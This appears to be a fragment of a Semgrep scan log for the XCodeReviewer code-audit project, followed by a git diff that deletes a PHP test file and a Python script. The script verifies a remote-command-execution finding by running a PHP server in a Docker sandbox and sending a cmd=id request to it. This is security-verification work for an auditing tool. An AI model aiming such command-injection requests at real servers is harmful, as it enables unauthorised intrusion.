python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/database.py","start":{"line":488,"col":11,"offset":18788},"end":{"line":488,"col":29,"offset":18806}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/scan.py:47:10 [rules: 2, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/api/v1/endpoints/scan.py","start":{"line":47,"col":11,"offset":1499},"end":{"line":47,"col":27,"offset":1515}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/db/init_db.py:51:10 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/db/init_db.py","start":{"line":51,"col":11,"offset":1548},"end":{"line":51,"col":27,"offset":1564}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/analysis.py:236:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/analysis.py","start":{"line":236,"col":15,"offset":7437},"end":{"line":236,"col":18,"offset":7440}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/orchestrator.py:144:14 [rules: 1, first: 
python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/orchestrator.py","start":{"line":144,"col":15,"offset":4111},"end":{"line":144,"col":18,"offset":4114}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/react_agent.py:253:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/react_agent.py","start":{"line":253,"col":15,"offset":8497},"end":{"line":253,"col":18,"offset":8500}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/recon.py:207:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/recon.py","start":{"line":207,"col":15,"offset":6233},"end":{"line":207,"col":18,"offset":6236}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/verification.py:216:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/agents/verification.py","start":{"line":216,"col":15,"offset":6905},"end":{"line":216,"col":18,"offset":6908}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/audit_graph.py:580:14 [rules: 1, first: 
python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/audit_graph.py","start":{"line":580,"col":15,"offset":18800},"end":{"line":580,"col":18,"offset":18803}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/nodes.py:139:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/nodes.py","start":{"line":139,"col":15,"offset":5316},"end":{"line":139,"col":23,"offset":5324}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/nodes.py:277:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/graph/nodes.py","start":{"line":277,"col":15,"offset":11241},"end":{"line":277,"col":23,"offset":11249}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/json_parser.py:150:8 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/json_parser.py","start":{"line":150,"col":9,"offset":4774},"end":{"line":150,"col":14,"offset":4779}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/code_analysis_tool.py:342:14 [rules: 1, first: 
python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/code_analysis_tool.py","start":{"line":342,"col":15,"offset":11823},"end":{"line":342,"col":23,"offset":11831}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/code_analysis_tool.py:72:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/code_analysis_tool.py","start":{"line":72,"col":15,"offset":1932},"end":{"line":72,"col":23,"offset":1940}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py:101:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py","start":{"line":101,"col":15,"offset":2731},"end":{"line":101,"col":23,"offset":2739}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py:300:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py","start":{"line":300,"col":15,"offset":10031},"end":{"line":300,"col":23,"offset":10039}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py:585:14 [rules: 1, first: 
python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py","start":{"line":585,"col":15,"offset":20431},"end":{"line":585,"col":23,"offset":20439}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py:803:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/external_tools.py","start":{"line":803,"col":15,"offset":28487},"end":{"line":803,"col":23,"offset":28495}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/file_tool.py:217:14 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/file_tool.py","start":{"line":217,"col":15,"offset":6991},"end":{"line":217,"col":23,"offset":6999}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/pattern_tool.py:38:6 [rules: 1, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/agent/tools/pattern_tool.py","start":{"line":38,"col":7,"offset":963},"end":{"line":38,"col":23,"offset":979}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/rag/splitter.py:482:8 [rules: 1, first: 
python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/rag/splitter.py","start":{"line":482,"col":9,"offset":16235},"end":{"line":482,"col":33,"offset":16259}}},{"error_type":"Fixpoint timeout","severity":"warn","message":"Fixpoint timeout while performing taint analysis at /Users/lintsinghua/XCodeReviewer/backend/app/services/scanner.py:238:10 [rules: 2, first: python.boto3.security.hardcoded-token.hardcoded-token]","location":{"path":"/Users/lintsinghua/XCodeReviewer/backend/app/services/scanner.py","start":{"line":238,"col":11,"offset":8735},"end":{"line":238,"col":25,"offset":8749}}}],"prefiltering":{"project_level_time":0.0,"file_level_time":0.0,"rules_with_project_prefilters_ratio":0.0,"rules_with_file_prefilters_ratio":0.9899620184481823,"rules_selected_ratio":0.0529028757460662,"rules_matched_ratio":0.0529028757460662},"targets":[],"total_bytes":0,"max_memory_bytes":1613084800},"engine_requested":"OSS","skipped_rules":[],"profiling_results":[]} diff --git a/ttt/t.php b/ttt/t.php deleted file mode 100644 index bb341e8..0000000 --- a/ttt/t.php +++ /dev/null @@ -1 +0,0 @@ - diff --git a/verify_rce_sandbox.py b/verify_rce_sandbox.py deleted file mode 100644 index 0433c10..0000000 --- a/verify_rce_sandbox.py +++ /dev/null 
@@ -1,87 +0,0 @@ - -import asyncio -import base64 -import os -import sys - -# 添加 backend 目录到路径 -sys.path.append(os.path.join(os.getcwd(), "backend")) - -from app.services.agent.tools.sandbox_tool import SandboxManager, SandboxConfig - -async def verify_rce(): - print("🚀 开始验证 RCE 漏洞...") - - # 1. 读取目标文件内容 - file_path = "ttt/t.php" - if not os.path.exists(file_path): - print(f"❌ 文件不存在: {file_path}") - return - - with open(file_path, "rb") as f: - content = f.read() - - b64_content = base64.b64encode(content).decode() - print(f"📄 读取文件 {file_path} ({len(content)} bytes)") - - # 2. 初始化沙箱管理器 - # 注意:需要启用网络模式以便 curl 本地服务(虽然是 localhost,但 bridge 模式更稳妥,或者默认 none 也可以访问 localhost? - # Docker none 网络模式只有 loopback 接口,所以 localhost 是可以通的。 - # 但是为了保险,我们使用默认配置(通常是 none),如果不行再调整。 - # 这里的关键是 php server 和 curl 在同一个容器内运行。 - - config = SandboxConfig() - # 确保网络模式允许本地通信(none 模式下只有 lo,应该没问题) - # 但有些环境可能需要 bridge - # config.network_mode = "bridge" - - manager = SandboxManager(config) - await manager.initialize() - - if not manager.is_available: - print("❌ Docker 沙箱不可用") - return - - print("🐳 沙箱初始化成功") - - # 3. 构造验证 Payload - # - 创建目录 - # - 写入文件 (使用 base64 避免转义问题) - # - 启动 PHP 服务器 (后台运行) - # - 等待服务器启动 - # - 发送恶意请求 (cmd=id) - - cmd_payload = "id" - verification_url = f"http://localhost:8000/t.php?cmd={cmd_payload}" - - sandbox_cmd = ( - f"mkdir -p ttt && " - f"echo '{b64_content}' | base64 -d > ttt/t.php && " - f"TMPDIR=/workspace php -S 0.0.0.0:8000 -t ttt > php.log 2>&1 & " - f"sleep 3 && " - f"curl -v '{verification_url}' || (echo '--- PHP LOG ---' && cat php.log)" - ) - - print(f"⚡ 执行沙箱命令:\n{sandbox_cmd}\n") - - result = await manager.execute_command(sandbox_cmd, timeout=10) - - # 4. 
分析结果 - print("📊 执行结果:") - print(f"Success: {result['success']}") - print(f"Exit Code: {result['exit_code']}") - print(f"Stdout: {result['stdout'].strip()}") - print(f"Stderr: {result['stderr'].strip()}") - - if result['success']: - output = result['stdout'] - if "uid=" in output and "gid=" in output: - print("\n✅ 漏洞验证成功!发现了命令执行结果。") - print(f"证明: {output.strip()}") - else: - print("\n⚠️ 命令执行成功,但未发现预期的 id 命令输出。") - else: - print("\n❌ 验证执行失败。") - -if __name__ == "__main__": - asyncio.run(verify_rce())